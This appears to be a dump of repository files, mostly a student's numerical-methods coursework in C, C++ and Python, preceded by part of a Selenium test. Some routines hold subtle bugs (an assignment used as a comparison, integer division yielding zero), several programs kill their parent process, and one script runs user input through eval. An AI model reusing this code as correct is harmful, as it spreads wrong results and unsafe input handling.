str(self.demo_favourite.pk)).click()\n\n self.assertEquals(\n self.browser.current_url,\n self.index_url\n )\n\n self.assertEquals(\n self.browser.find_element_by_id('inputOrigin').get_attribute(\"value\"),\n self.demo_favourite.origin_name\n )\n\n self.assertEquals(\n self.browser.find_element_by_id('inputDestin').get_attribute(\"value\"),\n self.demo_favourite.destin_name\n )\n\n self.assertEquals(\n self.browser.find_element_by_id('favouriteButton').get_attribute('class'),\n \"btn btn-info\"\n )\n \n #Check that mapmarkers exist\n\n def test_favourite_delete(self):\n\n self.browser.get(self.login_url)\n self.browser.find_element_by_name(\"username\").send_keys(self.demo_user.username)\n self.browser.find_element_by_name(\"password\").send_keys(self.demo_passwd)\n self.browser.find_element_by_id('submitButton').click()\n\n self.browser.get(self.favourite_url)\n\n self.browser.find_element_by_id('deleteButton' + str(self.demo_favourite.pk)).click()\n\n self.assertFalse(\n idExists(self, str(self.demo_favourite.pk))\n )\n\n\n\n def test_favourite_go_bus(self):\n\n stop1 = Stop(stop_id=\"8220DB000003\", stop_name=\"Dorset Street Lower, stop 14\", stop_lat=53.358531237878196, stop_lon = -6.2627765057086595)\n stop2 = Stop(stop_id=\"8220DB000014\", stop_name=\"Parnell Square West, stop 3\", stop_lat=53.352308551434895, stop_lon = -6.26381074216821)\n \n stop1.save()\n stop2.save()\n \n bus_favourite = favourite(user_id = self.demo_user.pk,\n origin_name= 'Dorset Street Lower, stop 14',\n origin_lat = 53.358531237878196, \n origin_lon = -6.2627765057086595, \n destin_name = 'Parnell Square West, stop 3', \n destin_lat = 53.352308551434895, \n destin_lon = -6.26381074216821,\n stops = 1\n )\n\n bus_favourite.save()\n\n\n\n self.browser.get(self.login_url)\n self.browser.find_element_by_name(\"username\").send_keys(self.demo_user.username)\n self.browser.find_element_by_name(\"password\").send_keys(self.demo_passwd)\n self.browser.find_element_by_id('submitButton').click()\n\n self.browser.get(self.favourite_url)\n\n\n self.browser.find_element_by_id('goButton' + str(bus_favourite.pk)).click()\n\n self.assertEquals(\n self.browser.current_url,\n self.index_url\n )\n\n self.assertTrue(\n self.browser.find_element_by_id('inputFirstStop').is_displayed()\n #idExists(self, 'inputFirstStop')\n )\n\n self.assertTrue(\n self.browser.find_element_by_id('inputLastStop').is_displayed()\n #idExists(self, 'inputLastStop')\n )\n\n self.assertEquals(\n self.browser.find_element_by_id('inputFirstStop').get_attribute(\"value\"),\n bus_favourite.origin_name\n )\n\n self.assertEquals(\n self.browser.find_element_by_id('inputLastStop').get_attribute(\"value\"),\n bus_favourite.destin_name\n )\n\n self.assertEquals(\n self.browser.find_element_by_id('favouriteButton').get_attribute('class'),\n \"btn btn-info\"\n )\n\ndef idExists(self, id):\n try:\n self.find_element_by_id(id)\n return True\n except:\n return False" } ]
25
dudustefanello/calculo-numerico
https://github.com/dudustefanello/calculo-numerico
f04824b3f3ed4a6e16f76a7a96968560a46c4962
fa6aa51326eeac903b54d0461a8c832d3c6b6c45
70bd493f6cc80ee9f1ca9f1108395a864be2b6f8
refs/heads/master
2021-04-15T18:01:57.107460
2018-06-30T19:28:39
2018-06-30T19:28:39
126,899,181
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.55513596534729, "alphanum_fraction": 0.5815709829330444, "avg_line_length": 20.015872955322266, "blob_id": "e53ff84726e33f60d9bbd3c8a81796d4049181f4", "content_id": "e3cd72d999829623752672cd1ff769b1b093f057", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1325, "license_type": "no_license", "max_line_length": 74, "num_lines": 63, "path": "/raizes/bissecao/bissecao.h", "repo_name": "dudustefanello/calculo-numerico", "src_encoding": "UTF-8", "text": "#include \"funcoes.h\"\n#include \"../comum.h\"\n\ntypedef struct bissecao{\n int i;\n retorno (*metodo)(double a, double b, double (*funcao)(double));\n char desc[100];\n}bissecao;\n\nint sinal(double x1, double x2){\n if (x1 * x2 < 0) return -1;\n if (x1 * x2 > 0) return 1;\n return 0;\n}\n\nint iteracoes(double a, double b){\n return ceil((log10(b - a) - log10(EPSON)) / log10(2)) - 1;\n}\n\nretorno bissecaoEstimativa(double a, double b, double (*funcao)(double)) {\n retorno ret;\n double x;\n\n ret.y = 1;\n ret.iteracoes = iteracoes(a, b);\n\n for (int i = 0; i <= ret.iteracoes; i++) {\n x = ret.y;\n ret.y = a + (b - a) / 2;\n\n ret.erro = erro(ret.y, x);\n\n if (sinal(funcao(a), funcao(ret.y)) < 0) b = ret.y;\n else a = ret.y;\n }\n return ret;\n}\n\nretorno bissecaoErro(double a, double b, double (*funcao)(double)) {\n retorno ret;\n double x;\n int sai = 0;\n\n ret.y = 1;\n\n for (ret.iteracoes = 0; 1; ret.iteracoes++) {\n x = ret.y;\n ret.y = a + (b - a) / 2;\n ret.erro = erro(ret.y, x);\n\n if (fabs(funcao(ret.y)) < EPSON || sai) break;\n if (ret.erro < EPSON) sai = 1;\n\n if (sinal(funcao(a), funcao(ret.y)) < 0) b = ret.y;\n else a = ret.y;\n }\n return ret;\n}\n\nbissecao bissecoes[] = {\n 0, bissecaoEstimativa, \"Com estimativa de iteracoes\",\n 1, bissecaoErro, \"Com cálculo de erro por iteracao\"\n};\n" }, { "alpha_fraction": 0.46304774284362793, "alphanum_fraction": 0.49705690145492554, "avg_line_length": 17.64634132385254, "blob_id": "ac32286252232a251e833e8e9d66f6c9cc98f97c", "content_id": "afb84671d9eb0966f561b12eeaf5a01c0d4afa31", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1532, "license_type": "no_license", "max_line_length": 53, "num_lines": 82, "path": "/raizes/newton/main.cpp", "repo_name": "dudustefanello/calculo-numerico", "src_encoding": "UTF-8", "text": "// #include \"newton.h\"\n//\n// using namespace std;\n//\n// void imprimir(tipoEntrada i){\n// retorno ret = executar(i.x0, i.f);\n// if (ret.iteracoes == 1000){\n// printf(\"Função Fi %d não convergiu\\n\\n\", i.f);\n// return;\n// }\n// printf(\"Fi %d: \\n\", i.f);\n// printf(\"Original: %s\\n\", funcoes[i.f].func);\n// printf(\"Fi: %s\\n\", funcoes[i.f].fi);\n// printf(\"x = %lf\\n\", ret.y);\n// printf(\"Iteracoes: %d\\n\", ret.iteracoes);\n// printf(\"Erro: %lf\\n\\n\", ret.erro);\n// }\n//\n// int main(int argc, char const *argv[]) {\n// for (auto &i: entradas) imprimir(i);\n// return 0;\n// }\n\n#include <stdio.h>\n#define _USE_MATH_DEFINES\n#include <cmath>\n\ndouble f1(double x){\n return x*x*x - 2*x*x - 5;\n}\ndouble d1(double x){\n return 3*x*x - 4*x;\n}\n\ndouble f2(double x){\n return x*x*x + 3*x*x - 1;\n}\ndouble d2(double x){\n return 3*x*x + 6*x;\n}\n\ndouble f3(double x){\n return x - cos(x);\n}\ndouble d3(double x){\n return 1 - sin(x);\n}\n\ndouble f4(double x){\n return x - 0.8 - 0.2*sin(x);\n}\ndouble d4(double x){\n return 1 - 0.2*cos(x);\n}\n\nint main(int argc, char const *argv[]) {\n double y, x = 1;\n for (size_t i = 0; i < 5; i++) {\n y = x - f1(x)/d1(x);\n printf(\"1 %lf\\n\", x);\n x = y;\n }\n\n for (size_t i = 0; i < 5; i++) {\n y = x - f2(x)/d2(x);\n printf(\"2 %lf\\n\", x);\n x = y;\n }\n\n for (size_t i = 0; i < 5; i++) {\n y = x - f3(x)/d3(x);\n printf(\"3 %lf\\n\", x);\n x = y;\n }\n\n for (size_t i = 0; i < 5; i++) {\n y = x - f4(x)/d4(x);\n printf(\"4 %lf\\n\", x);\n x = y;\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.5746887922286987, "alphanum_fraction": 0.5871369242668152, "avg_line_length": 20.909090042114258, "blob_id": "a5f2156af38847c62c9983cf2f8191ef8603f641", "content_id": "efccde5380da96db211c9283a97b014709e95486", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 965, "license_type": "no_license", "max_line_length": 82, "num_lines": 44, "path": "/sistemas/jacobi-saidel/main.cpp", "repo_name": "dudustefanello/calculo-numerico", "src_encoding": "UTF-8", "text": "#include <unistd.h>\n#include <signal.h>\n#include <iostream>\n#include <string.h>\n#include \"jacobi.cpp\"\n\nusing namespace std;\n\nvoid imprimir(){\n if (linhas()) fprintf(arquivo, \"A matriz não passou no criterio das linhas!\\n\");\n else fprintf(arquivo, \"A matriz passou no criterio das linhas.\\n\\n\");\n\n jacobi();\n seidel();\n\n fprintf(arquivo, \"Gaus-Jacobi: \\n\");\n for (int i = 0; i < ordem; i++) {\n fprintf(arquivo, \"%c = %3.5lf\\n\", varnomes[i], coeficientes[i]);\n }\n\n fprintf(arquivo, \"\\nGaus-Seidel: \\n\");\n for (int i = 0; i < ordem; i++) {\n fprintf(arquivo, \"%c = %3.5lf\\n\", varnomes[i], coeficientes2[i]);\n }\n\n fprintf(arquivo, \"\\n\");\n for (int i = 0; i < ordem; i++) {\n for (int j = 0; j < ordem; j++) {\n fprintf(arquivo, \"%.1lf \", matriz[i][j]);\n }\n fprintf(arquivo, \"%.1lf\\n\", independentes[i]);\n }\n\n}\n\nint main() {\n arquivo = fopen(\"saida.txt\", \"w\");\n imprimir();\n\n fclose(arquivo);\n\n kill(getppid(), SIGKILL);\n return 0;\n}\n" }, { "alpha_fraction": 0.614664614200592, "alphanum_fraction": 0.6271451115608215, "avg_line_length": 19.677419662475586, "blob_id": "8cc438205028fcff70cb195b364b64a7aee962fa", "content_id": "2bfab8028e2d741b183f0c750c626b508a8e65c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 641, "license_type": "no_license", "max_line_length": 56, "num_lines": 31, "path": "/raizes/newton/arquivo.cpp", "repo_name": "dudustefanello/calculo-numerico", "src_encoding": "UTF-8", "text": "#include <unistd.h>\n#include <signal.h>\n#include \"newton.h\"\n\nusing namespace std;\n\nFILE *arquivo;\n\nvoid imprimir(tipoEntrada i){\n retorno ret = executar(i.x0, i.f);\n if (ret.iteracoes == 1000){\n fprintf(arquivo, \"Funcao %d, nao convergiu\\n\", i.f);\n return;\n }\n fprintf(arquivo, \"Funaco %d: \\n\", i.f);\n fprintf(arquivo, \"x = %.8lf\\n\", ret.y);\n fprintf(arquivo, \"Iteracoes: %d\\n\", ret.iteracoes);\n fprintf(arquivo, \"Erro: %.8lf\\n\\n\", ret.erro);\n}\n\nint main(int argc, char const *argv[]) {\n arquivo = fopen(\"saida.txt\", \"w\");\n\n for (auto &i: entradas) imprimir(i);\n\n fclose(arquivo);\n\n kill(getppid(), SIGKILL);\n\n return 0;\n}\n" }, { "alpha_fraction": 0.39022499322891235, "alphanum_fraction": 0.4359968900680542, "avg_line_length": 23.80769157409668, "blob_id": "ecf343e1afab4672def0aed92b8e67c17e1fb2e5", "content_id": "4dcdc0a7c4d0efc7bbce0afd4e07e112776275b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1289, "license_type": "no_license", "max_line_length": 83, "num_lines": 52, "path": "/interpolacao-newton/PythonApplication2/interpolacao.py", "repo_name": "dudustefanello/calculo-numerico", "src_encoding": "UTF-8", "text": "import math\n\nentrada = [(-1, math.exp(-1)),\n (-1/2, math.exp(-1/2)),\n (0, math.exp(0)),\n (1/2, math.exp(1/2)),\n (1, math.exp(1))]\n\n\ndiferencas = {}\n\ndiferencas.update({0: []})\nfor i in range(len(entrada) - 1): \n diferencas[0].append((entrada[i + 1][1] - entrada[i][1])/\n (entrada[i + 1][0] - entrada[i][0]))\n\nk = 1\nwhile k < len(entrada) - 1:\n for i in range(len(diferencas[k - 1]) - 1):\n if k not in diferencas:\n diferencas.update({k: []})\n \n diferencas[k].append((diferencas[ k - 1 ][i + 1] - diferencas[k - 1][i])/\n ( entrada[i + k + 1][ 0 ] - entrada[ i ][0]))\n k += 1\n\nx = -0.8\np = entrada[0][1]\n\npoli = str(p)[:7] + '+'\n\nfor i in range(len(diferencas)):\n k = 0\n r = 1\n while k <= i:\n r *= (x - entrada[k][0])\n if entrada[k][0] < 0:\n poli += '(x+' + str(entrada[k][0]*-1)[:7] + ')'\n else:\n poli += '(x-' + str(entrada[k][0])[:7] + ')'\n k += 1;\n p += r * diferencas[i][0]\n poli += '*' + str(diferencas[i][0])[:7]\n\n\nprint('Polinomio = ', str(p)[:10])\nprint(poli + '=' + str(p))\nprint('')\nprint('Euler:', math.exp(x))\nprint('')\nprint('Erro:', p - math.exp(x))\nprint('1--1', 1--1)" }, { "alpha_fraction": 0.503311276435852, "alphanum_fraction": 0.5238410830497742, "avg_line_length": 19.405405044555664, "blob_id": "cc57de8a6cdf9222a82d965717e42025bea2eb06", "content_id": "78f3dd6a81aa5cd68930e8a3c5df63eb6f2778f1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1510, "license_type": "no_license", "max_line_length": 66, "num_lines": 74, "path": "/sistemas/jacobi-saidel/jacobi-seidel.cpp", "repo_name": "dudustefanello/calculo-numerico", "src_encoding": "UTF-8", "text": "#include \"entrada.h\"\n#define _USE_MATH_DEFINES\n#include <cmath>\n\nFILE *arquivo;\n\ndouble velhos[ordem];\n\nint linhas(){\n double diagonal, soma;\n for (int i = 0; i < ordem; i++) {\n soma = 0;\n for (int j = 0; j < ordem; j++) {\n if (i = j) diagonal = abs(matriz[i][j]);\n else soma += abs(matriz[i][j]);\n }\n if (diagonal <= soma) return 0;\n }\n return 1;\n}\n\nint continuar(){\n for (int i = 0; i < ordem; i++)\n if (fabs(coeficientes[i] - velhos[i]) < epson)\n return 0;\n return 1;\n}\n\nint continuar2(){\n for (int i = 0; i < ordem; i++)\n if (fabs(coeficientes2[i] - velhos[i]) < epson)\n return 0;\n return 1;\n}\n\nvoid jacobi(){\n double soma, coeficiente;\n\n for (int i = 0; i < ordem; i++) velhos[i] = 0;\n\n do {\n for (int i = 0; velhos[i] = coeficientes[i], i < ordem; i++);\n\n for (int i = 0; i < ordem; i++) {\n coeficiente = 0;\n\n soma = independentes[i];\n for (int j = 0; j < ordem; j++)\n if (i != j) soma -= matriz[i][j]*velhos[j];\n\n coeficientes[i] = (1/matriz[i][i])*soma;\n }\n } while (continuar());\n}\n\nvoid seidel(){\n double soma, coeficiente;\n\n for (int i = 0; i < ordem; i++) velhos[i] = 0;\n\n do {\n for (int i = 0; velhos[i] = coeficientes2[i], i < ordem; i++);\n\n for (int i = 0; i < ordem; i++) {\n coeficiente = 0;\n\n soma = independentes[i];\n for (int j = 0; j < ordem; j++)\n if (i != j) soma -= matriz[i][j]*coeficientes2[j];\n\n coeficientes2[i] = (1/matriz[i][i])*soma;\n }\n } while (continuar2());\n}\n" }, { "alpha_fraction": 0.5747126340866089, "alphanum_fraction": 0.6379310488700867, "avg_line_length": 11.428571701049805, "blob_id": "2f9860dfe5f42676741b3fd68cf0b454fb6c9ad3", "content_id": "43c026661381c605db155137e6285a440b5a4d83", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 174, "license_type": "no_license", "max_line_length": 26, "num_lines": 14, "path": "/raizes/newton/entrada.h", "repo_name": "dudustefanello/calculo-numerico", "src_encoding": "UTF-8", "text": "#define EPSON 0.00001\n\n#define _USE_MATH_DEFINES\n#include <cmath>\n\ntypedef struct{\n int f;\n double x0;\n}tipoEntrada;\n\ntipoEntrada entradas[] = {\n // 1, M_PI/2,\n 1, 1,\n};\n" }, { "alpha_fraction": 0.6098397970199585, "alphanum_fraction": 0.6167048215866089, "avg_line_length": 23.97142791748047, "blob_id": "fdc32c5f545cef519bdf52c9c686b02181f5edf2", "content_id": "4fdd5105cc65d38113a8a5039c3660c4a547f4d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 874, "license_type": "no_license", "max_line_length": 65, "num_lines": 35, "path": "/raizes/bissecao/arquivo.cpp", "repo_name": "dudustefanello/calculo-numerico", "src_encoding": "UTF-8", "text": "#include <unistd.h>\n#include <signal.h>\n#include <stdio.h>\n#include \"bissecao.h\"\n\nusing namespace std;\n\nFILE *arquivo;\n\nvoid imprimir(tipoEntrada i, bissecao j){\n retorno ret = j.metodo(i.a, i.b, funcoes[i.f].funcao);\n\n fprintf(arquivo, \"Funcao %d: (%s)\\n\", i.f, funcoes[i.f].desc);\n fprintf(arquivo, \"Metodo: %s)\\n\", j.desc);\n fprintf(arquivo, \"Intervalo: [%.3lf, %.3lf]\\n\", i.a, i.b);\n fprintf(arquivo, \"Iteracoes: %d\\n\", ret.iteracoes);\n fprintf(arquivo, \"x = %.8lf\\n\", ret.y);\n fprintf(arquivo, \"f(x) = %.8lf\\n\", funcoes[i.f].funcao(ret.y));\n fprintf(arquivo, \"Erro = %.8lf\\n\\n\", ret.erro);\n}\n\nint main(int argc, char const *argv[]) {\n arquivo = fopen(\"saida.txt\", \"w\");\n fprintf(arquivo, \"Epson: %lf\\n\\n\", EPSON);\n\n for (auto &i: entradas)\n for (auto &j: bissecoes)\n imprimir(i, j);\n\n fclose(arquivo);\n\n kill(getppid(), SIGKILL);\n\n return 0;\n}\n" }, { "alpha_fraction": 0.2630952298641205, "alphanum_fraction": 0.3273809552192688, "avg_line_length": 35.5217399597168, "blob_id": "e1549b1e862d94ca12aaf153e7d0eda258f2ca8d", "content_id": "14048452adcc0303c599d80dab6978dd80477b14", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 840, "license_type": "no_license", "max_line_length": 47, "num_lines": 23, "path": "/sistemas/jacobi-saidel/entrada.h", "repo_name": "dudustefanello/calculo-numerico", "src_encoding": "UTF-8", "text": "#define epson 0.0001\n\n// #define ordem 3\n// double matriz[ordem][ordem] = {15, 2, -1,\n// 2, 12, 1,\n// 1, 2, 8 },\n// independentes[ordem] = { -200,\n// -250,\n// 30 },\n// coeficientes[ordem] = { 0, 0, 0 },\n// coeficientes2[ordem] = { 0, 0, 0 };\n// char varnomes[ordem] = {'x','y','z'};\n\n#define ordem 3\ndouble matriz[ordem][ordem] = {10, 2, 1,\n 1, 5, 1,\n 2, 3, 10 },\n independentes[ordem] = { 7,\n -8,\n 6 },\n coeficientes[ordem] = { 0, 0, 0 },\n coeficientes2[ordem] = { 0, 0, 0 };\n char varnomes[ordem] = {'x','y','z'};\n" }, { "alpha_fraction": 0.5844155550003052, "alphanum_fraction": 0.5955473184585571, "avg_line_length": 23.5, "blob_id": "dc83df2caabd4fabd85e12cbc54a5764d332fa13", "content_id": "e8a2267c9ea706091fa7e19d6147d48aef708f02", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 542, "license_type": "no_license", "max_line_length": 50, "num_lines": 22, "path": "/raizes/ponto-fixo/main.cpp", "repo_name": "dudustefanello/calculo-numerico", "src_encoding": "UTF-8", "text": "#include \"ponto-fixo.h\"\n\nusing namespace std;\n\nvoid imprimir(tipoEntrada i){\n retorno ret = executar(i.x0, i.f);\n if (ret.iteracoes == 1000){\n printf(\"Função Fi %d não convergiu\\n\\n\", i.f);\n return;\n }\n printf(\"Fi %d: \\n\", i.f);\n printf(\"Original: %s\\n\", funcoes[i.f].func);\n printf(\"Fi: %s\\n\", funcoes[i.f].fi);\n printf(\"x = %lf\\n\", ret.y);\n printf(\"Iteracoes: %d\\n\", ret.iteracoes);\n printf(\"Erro: %lf\\n\\n\", ret.erro);\n}\n\nint main(int argc, char const *argv[]) {\n for (auto &i: entradas) imprimir(i);\n return 0;\n}\n" }, { "alpha_fraction": 0.3590005040168762, "alphanum_fraction": 0.48495665192604065, "avg_line_length": 24.802631378173828, "blob_id": "8c1d348c963f74aea5f9d9236cf30415c584456e", "content_id": "9a2a07292f5ecd42666c334f9ec13ffaaeb4fa07", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1962, "license_type": "no_license", "max_line_length": 114, "num_lines": 76, "path": "/raizes/ponto-fixo/funcoes.h", "repo_name": "dudustefanello/calculo-numerico", "src_encoding": "UTF-8", "text": "#include \"entrada.h\"\n#include <iostream>\n\n#define _USE_MATH_DEFINES\n#include <cmath>\n\ntypedef struct funcao{\n int i;\n double (*funcao)(double x);\n char func[100], fi[100];\n}funcao;\n\ndouble f01(double x){\n return 2 * cos(x) - x;\n}\ndouble f02(double x){\n return cos(x);\n}\n\ndouble f11(double x){\n return sqrt(7*x);\n}\ndouble f12(double x){\n return x*x/7;\n}\ndouble f13(double x){\n return x*x-6*x;\n}\n\ndouble f21(double x){\n return 2*x + 10*sin(x);\n}\ndouble f22(double x){\n return 10*sin(x) / 2;\n}\n\ndouble f23(double x){\n return acos(-pow(x, 2)/10);\n}\ndouble f24(double x){\n return sqrt(-10*cos(x));\n}\n\ndouble f31(double x){\n return (300 + ((pow(0.25, 2) * 32.17)/0.1)*x*(1 - pow(M_E, (-0.1/0.25)*x)))/((0.25*32.17)/0.1);\n}\n\ndouble f41(double x){\n return pow((3 + x + 2*x*x), 1/4);\n}\ndouble f42(double x){\n return pow((x + 3 - pow(x, 4))/2, 1/2);\n}\ndouble f43(double x){\n return pow((x + 3)/(x*x + 2), 1/2);\n}\ndouble f44(double x){\n return (3*pow(x, 4) + 2*x + 3)/(4*pow(x, 3) + 4*x - 1);\n}\n\nfuncao funcoes[] = {\n 0, f01, \"f(x) = cos(x) - x\", \"fi(x) = 2 * cos(x) - x\",\n 1, f02, \"f(x) = cos(x) - x\", \"fi(x) = cos(x)\",\n 2, f11, \"f(x) = x^2 - 7x\", \"fi(x) = sqrt(7x)\",\n 3, f12, \"f(x) = x^2 - 7x\", \"fi(x) = x^2 / 7\",\n 4, f13, \"f(x) = x^2 - 7x\", \"fi(x) = x^2 - 6x\",\n 5, f21, \"f(x) = x^2 + 10cos(x)\", \"fi(x) = 2x + 10sin(x)\",\n 6, f22, \"f(x) = x^2 + 10cos(x)\", \"fi(x) = 10sin(x)/2\",\n 7, f23, \"f(x) = x^2 + 10cos(x)\", \"fi(x) = acos(pow(-x, 2)/10)\",\n 8, f24, \"f(x) = x^2 + 10cos(x) (Questão 2)\", \"fi(x) = sqrt(-10*cos(x))\",\n 9, f31, \"questao 3\", \"(300 + ((pow(0.25, 2) * 32.17)/0.1)*x*(1 - pow(M_E, (-0.1/0.25)*x)))/((0.25*32.17)/0.1)\",\n 10, f41, \"f(x) = x^4 + 2x^2 - x - 3\", \"(3 + x + 2x^2)^(1/4)\",\n 11, f42, \"f(x) = x^4 + 2x^2 - x - 3\", \"pow((x + 3 - pow(x, 4))/2, 1/2)\",\n 12, f43, \"f(x) = x^4 + 2x^2 - x - 3\", \"pow((x + 3)/(x*x + 2), 1/2)\",\n 13, f44, \"f(x) = x^4 + 2x^2 - x - 3\", \"(3*pow(x, 4) + 2*x + 3)/(4*pow(x, 3) + 4*x - 1)\",\n};\n" }, { "alpha_fraction": 0.5982028245925903, "alphanum_fraction": 0.6026957631111145, "avg_line_length": 21.257143020629883, "blob_id": "c56e33b53de30cf4744d13fc915a6b6922e26d0d", "content_id": "e91dc4c9aa981197f3899f58c3a380fc1ecfdf12", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1563, "license_type": "no_license", "max_line_length": 97, "num_lines": 70, "path": "/raizes/bissecao/interface.cpp", "repo_name": "dudustefanello/calculo-numerico", "src_encoding": "UTF-8", "text": "#include \"bissecao.h\"\n\nusing namespace std;\n\nvoid imprimirFuncoes(){\n printf(\"Funções Implementadas:\\n\");\n for (auto &i: entradas) printf(\"%2d. %s\\n\", i.f, funcoes[i.f].desc);\n}\n\nint escolhaFuncao(){\n int ret;\n printf(\"\\nEscolha uma função: \");\n scanf(\"%d\", &ret);\n return ret;\n}\n\nvoid escolhaIntervalo(double *a, double *b, int f){\n double r, s;\n printf(\"\\nInforme o início do intervalo: \");\n scanf(\"%lf\", &r);\n\n printf(\"\\nInforme o final do intervalo: \");\n scanf(\"%lf\", &s);\n\n if (fabs(r - s) < EPSON){\n printf(\"O intervalo usado sera o da implementacao.\\n\");\n *a = entradas[f].a;\n *b = entradas[f].b;\n }\n else{\n *a = r;\n *b = s;\n }\n}\n\nint escolhaMetodo(){\n int ret;\n printf(\"\\nEscolha um Criterio de Parada:\\n\");\n for (auto &i: bissecoes) printf(\"%d. %s\\n\", i.i, i.desc);\n scanf(\"%d\", &ret);\n printf(\"\\n\");\n return ret;\n}\n\nvoid imprimirResultado(int f, double a, double b, int m){\n retorno ret = bissecoes[m].metodo(entradas[f].a, entradas[f].b, funcoes[entradas[f].f].funcao);\n\n printf(\"Funcao %d: \\n\", entradas[f].f);\n printf(\"Intervalo: [%.3lf, %.3lf]\\n\", entradas[f].a, entradas[f].b);\n printf(\"Iteracoes: %d\\n\", ret.iteracoes);\n printf(\"x = %.8lf\\n\", ret.y);\n printf(\"f(x) = %.8lf\\n\", funcoes[entradas[f].f].funcao(ret.y));\n printf(\"Erro = %.8lf\\n\\n\", ret.erro);\n}\n\nint main(int argc, char const *argv[]) {\n int funcao, m;\n double a, b;\n\n imprimirFuncoes();\n funcao = escolhaFuncao();\n\n escolhaIntervalo(&a, &b, funcao);\n\n m = escolhaMetodo();\n\n imprimirResultado(funcao, a, b, m);\n\n return 0;\n}\n" }, { "alpha_fraction": 0.5388349294662476, "alphanum_fraction": 0.5849514603614807, "avg_line_length": 14.84615421295166, "blob_id": "87e2afab8b6ff0de1ceda25dcfdcf7effd402308", "content_id": "7c5db3cbd8ce1e0cb4d47616193c990a88f730d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 412, "license_type": "no_license", "max_line_length": 53, "num_lines": 26, "path": "/raizes/newton/funcoes.h", "repo_name": "dudustefanello/calculo-numerico", "src_encoding": "UTF-8", "text": "#include \"entrada.h\"\n#include <iostream>\n\ntypedef struct funcoes {\n double (*funcao)(double x);\n double (*derivada)(double x);\n}funcoes;\n\ndouble f1(double x){\n return 1/2 + (1/4)*x*x - x*sin(x) - (1/2)*cos(2*x);\n}\ndouble d1(double x){\n return x/2 - sin(x) + sin(2*x) + x*(-cos(x));\n}\n\ndouble f2(double x){\n return x*x - 6;\n}\ndouble d2(double x){\n return 2*x;\n}\n\nfuncoes funcao[] = {\n f1, d1,\n f2, d2,\n};\n" }, { "alpha_fraction": 0.6541353464126587, "alphanum_fraction": 0.6541353464126587, "avg_line_length": 15.625, "blob_id": "9e16d3e4a9e2068d30eebebfeb63c4c15e54fc92", "content_id": "0a9873cb086e0e50c2d4212c41fbaff802355db9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 133, "license_type": "no_license", "max_line_length": 32, "num_lines": 8, "path": "/raizes/comum.h", "repo_name": "dudustefanello/calculo-numerico", "src_encoding": "UTF-8", "text": "typedef struct retorno{\n double y, erro;\n int iteracoes;\n}retorno;\n\ndouble erro(double a, double b){\n return fabs((a - b) / a);\n}\n" }, { "alpha_fraction": 0.4292604625225067, "alphanum_fraction": 0.440514475107193, "avg_line_length": 32.56756591796875, "blob_id": "153daeb5b9be1f996c192fca9282a5cb776b13a0", "content_id": "f81194d1520d0699fbf3a47bb2de311f63c54da9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1252, "license_type": "no_license", "max_line_length": 109, "num_lines": 37, "path": "/minimos-quadrados/bruno.py", "repo_name": "dudustefanello/calculo-numerico", "src_encoding": "UTF-8", "text": "print(\"------- Aproximação pelo Método de Mínimos Quadrados Linear -------\")\nn = eval(input(\"Digite o número de pontos: \"))\n\npontos = []\nsom_xi = 0\nsom_yi = 0\nsom_xiyi = 0\nsom_xi2 = 0\n\nfor i in range(n):\n x = eval(input(\"Preencha o valor de x: \"))\n y = eval(input(\"Preencha o valor de f({}): \".format(x)))\n pontos.append((x, y))\n som_xi += x\n som_yi += y\n som_xiyi += x*y\n som_xi2 += x**2\n\nb = ((som_xi2 * som_yi) - (som_xi * som_xiyi)) / ((n * som_xi2) - (som_xi ** 2))\na = ((n * som_xiyi) - (som_xi * som_yi)) / ((n * som_xi2) - (som_xi ** 2))\n\nprint(\"------------------------------\")\nprint(\"------------------------------\")\nprint(\"Pontos (x, y): {}\".format(pontos))\nprint(\"------------------------------\")\nprint(\"Som xi = {} | Som yi = {} | Som xi*yi = {} | Som xi^2 = {}\".format(som_xi, som_yi, som_xiyi, som_xi2))\nprint(\"------------------------------\")\nprint(\"Função g(x) = {}x + {}\".format(a, b))\nprint(\"------------------------------\")\nprint(\"------------------------------\")\n\nponto_a_avaliar = eval(input(\"Preencha o ponto a avaliar: \"))\naprx = (a*ponto_a_avaliar)+b\n\nprint(\"------------------------------\")\nprint(\"------------------------------\")\nprint(\"O valor aproximado de g(\",ponto_a_avaliar,\") é: \", aprx)\n\n\n" }, { "alpha_fraction": 0.4933469891548157, "alphanum_fraction": 0.5353121757507324, "avg_line_length": 15.862069129943848, "blob_id": "602ae296214e688404afd43102bc75d7c0776b85", "content_id": "18f36a0f990eb9b74177b6ab1abb23e835407570", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 977, "license_type": "no_license", "max_line_length": 47, "num_lines": 58, "path": "/integracao/PythonApplication3/integracao.py", "repo_name": "dudustefanello/calculo-numerico", "src_encoding": "UTF-8", "text": "import time\n\ndef funcao(x):\n return x ** 3 + x ** 2 + 5\n\n\ndef metodoTrapezio(n):\n\tsomatorio = 0.0\n\toperacoes = 0.0\n\n\th = (b - a) / n\n\n\tfor i in range(n):\n\t\tx0 = a + (h * i)\n\t\tx1 = a + (h * (i + 1))\n\t\tsomatorio += funcao(x0) + funcao(x1)\n\t\n\tsomatorio = somatorio * (h / 2)\n\n\treturn somatorio\n\n\ndef metodoSimpson(n):\n somatorio = 0.0\n operacoes = 0.0\n\n if n % 2 == 1:\n n += 1\n\n h = (b - a) / n\n\n for i in range(n 